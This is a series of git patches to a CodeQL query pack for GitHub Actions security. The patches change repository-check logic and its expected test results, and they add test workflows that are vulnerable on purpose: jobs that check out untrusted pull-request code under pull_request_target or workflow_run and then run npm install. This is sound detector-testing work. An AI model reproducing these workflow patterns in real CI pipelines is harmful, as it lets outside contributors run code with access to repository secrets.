inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05d..393dde04f356 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,5 +1,14 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | From 4edfdb4101ea98948304f253c981e3a4bc4ed8bb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:59:23 +0200 Subject: [PATCH 550/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6f57c4554d07..00d8e21c05df 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.58 +version: 0.1.59 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d3b65425c413..94468d4b96c8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.58 +version: 0.1.59 groups: [actions, queries] suites: codeql-suites extractor: javascript From c10d5a113e9ce3d0535335512b025bbf368fa604 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Mon, 30 Sep 2024 15:13:32 +0200 Subject: [PATCH 551/707] Rename help-file to match .ql file Reported by running ``` codeql generate query-help --format sarifv2.1.0 --output help.sairf ql/src/codeql-suites/actions-code-scanning.qls ``` --- ...stedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename ql/src/Security/CWE-367/{UntrustedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} (100%) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md rename to ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md From e0a2eb93d6ce3ccb2680412a7dc27fcefb2aacdb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:27:15 +0200 Subject: [PATCH 552/707] fix: Repository checks do not protect workflow_run triggered jobs --- .../codeql/actions/security/ControlChecks.qll | 31 +++++++++-- .../CWE-077/.github/workflows/test11.yml | 55 +------------------ .../CWE-077/EnvVarInjectionCritical.expected | 12 ++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 +--- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../workflows/untrusted_checkout_5.yml | 23 ++++++++ .../workflows/untrusted_checkout_6.yml | 23 ++++++++ .../workflow_run_untrusted_checkout_2.yml | 19 +++++++ .../workflow_run_untrusted_checkout_3.yml | 19 +++++++ .../UntrustedCheckoutCritical.expected | 8 +++ .../CWE-829/UntrustedCheckoutHigh.expected | 2 + 11 files changed, 128 insertions(+), 77 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index b9410f0fcb02..134ce780eeed 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -99,9 +99,6 @@ abstract class RepositoryCheck extends ControlCheck { // for pull_requests, that means that it triggers only on local branches or repos from the same org // - they are effective against pull requests/workflow_run since they can control where the code is coming from // - they are not effective against issue_comment since the repository will always be the same - override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() - } } abstract class PermissionCheck extends ControlCheck { @@ -173,9 +170,9 @@ class ActorIfCheck extends ActorCheck instanceof If { } } -class RepositoryIfCheck extends RepositoryCheck instanceof If { - RepositoryIfCheck() { - // eg: github.repository == 'test/foo' +class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { + PullRequestTargetRepositoryIfCheck() { + // eg: github.event.pull_request.head.repo.full_name == github.repository exists( normalizeExpr(this.getCondition()) // github.repository in a workflow_run event triggered by a pull request is the base repository @@ -188,6 +185,28 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { ], _, _) ) } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "pull_request_target" and category = any_relevant_category() + } +} + +class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { + WorkflowRunRepositoryIfCheck() { + // eg: github.event.workflow_run.head_repository.full_name == github.repository + exists( + normalizeExpr(this.getCondition()) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) + ) + } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "workflow_run" and category = any_relevant_category() + } } class AssociationIfCheck extends AssociationCheck instanceof If { diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 2c2480f5353c..5edd526d8201 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -8,37 +8,11 @@ on: jobs: comment: - if: ${{ github.repository_owner == 'cloudflare' }} + if: ${{ github.repository_owner == 'foo' }} runs-on: ubuntu-latest name: Write comment to the PR steps: - - name: "Put PR and workflow ID on the environment" - uses: actions/github-script@v7 - with: - script: | - // Copied from .github/extract-pr-and-workflow-id.js - const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ - owner: context.repo.owner, - repo: context.repo.repo, - run_id: context.payload.workflow_run.id, - }); - - for (const artifact of allArtifacts.data.artifacts) { - // Extract the PR number from the artifact name - const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); - if (match) { - const packageName = match[1].toUpperCase(); - require("fs").appendFileSync( - process.env.GITHUB_ENV, - `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + - `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` - ); - } - } - - name: "Download runtime versions" - # Regular `actions/download-artifact` doesn't support downloading - # artifacts from another workflow uses: dawidd6/action-download-artifact@v2 with: run_id: ${{ github.event.workflow_run.id }} @@ -52,30 +26,3 @@ jobs: cat runtime-versions.md echo EOF } >> "$GITHUB_ENV" - - - name: "Download pre-release report" - uses: dawidd6/action-download-artifact@v2 - with: - run_id: ${{ github.event.workflow_run.id }} - name: prerelease-report.md - - - name: "Put pre-release report on the environment" - id: prerelease_report - run: | - { - echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" - - - name: "Comment on PR with Wrangler link" - uses: marocchino/sticky-pull-request-comment@v2 - with: - number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} - message: | - ${{ env.PRERELEASE_REPORT }} - - --- - - ${{ env.RUNTIME_VERSIONS }} - diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index cbd17161942b..6ad5cf043044 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | @@ -100,6 +95,7 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index e780af4107dd..82602ee8ed88 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index d9e5d6be6707..47a0dfc6bd34 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -6,7 +6,7 @@ jobs: steps: - name: Get PR number id: pr_number - if: ${{ github.event_name == 'issue_comment'}} + if: github.event_name == 'issue_comment' && github.repository_owner == 'foo' run: | PR_URL="${{ github.event.issue.pull_request.url }}" PR_NUMBER=${PR_URL##*/} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml new file mode 100644 index 000000000000..b98d76549986 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml new file mode 100644 index 000000000000..037a0eb79f95 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.pull_request.head.repo.full_name == github.repository + env: + HEAD: ${{ github.event.pull_request.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml new file mode 100644 index 000000000000..bcde60f55cb8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.repository_owner == 'foo' + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml new file mode 100644 index 000000000000..55aa0b41c6c7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" && github.event.workflow_run.head_repository.full_name == github.repository + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4dc2b53e5910..f20fdc798291 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -262,7 +262,15 @@ edges | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| 